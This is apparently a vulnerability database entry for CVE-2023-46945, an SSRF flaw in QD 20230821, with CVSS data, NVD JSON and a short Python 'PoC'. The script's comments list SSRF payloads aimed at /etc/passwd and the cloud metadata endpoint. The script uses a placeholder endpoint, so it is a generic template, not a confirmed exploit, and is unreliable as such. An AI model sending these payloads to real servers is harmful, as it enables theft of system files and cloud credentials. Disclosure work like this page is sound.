Security Vulnerability Report
中文
CVE-2023-46945 CVSS 9.1 CRITICAL

CVE-2023-46945

Published: 2026-04-08 17:17:01
Last Modified: 2026-04-14 19:29:23

Description

QD 20230821 is vulnerable to Server-side request forgery (SSRF) via a crafted request

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:qd-today:qd:*:*:*:*:*:*:*:* - VULNERABLE
QD 20230821

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL of the vulnerable QD application target_url = "http://<target_ip>:<port>/api/endpoint" # Malicious payload demonstrating SSRF (e.g., accessing local metadata) # Common test payloads: http://127.0.0.1, file:///etc/passwd, http://169.254.169.254/latest/meta-data/ payload = { "url": "http://127.0.0.1:8080" } try: # Send the crafted request to trigger the vulnerability response = requests.post(target_url, data=payload, timeout=10) # Check if the request was successful if response.status_code == 200: print("[+] SSRF Triggered successfully!") print("Response:", response.text) else: print("[-] Failed to trigger SSRF. Status code:", response.status_code) except Exception as e: print("Error:", str(e))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-46945", "sourceIdentifier": "[email protected]", "published": "2026-04-08T17:17:01.010", "lastModified": "2026-04-14T19:29:23.040", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "QD 20230821 is vulnerable to Server-side request forgery (SSRF) via a crafted request"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qd-today:qd:*:*:*:*:*:*:*:*", "versionStartIncluding": "20220208", "versionEndIncluding": "20230821", "matchCriteriaId": "FD7FAE1E-5E6B-40B3-B648-DF32C05DC03D"}]}]}], "references": [{"url": "https://gist.github.com/kurokoleung/5b36b2013a54adadcce79967d3e4f056", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://qd-today.github.io/qd/", "source": "[email protected]", "tags": ["Product"]}]}}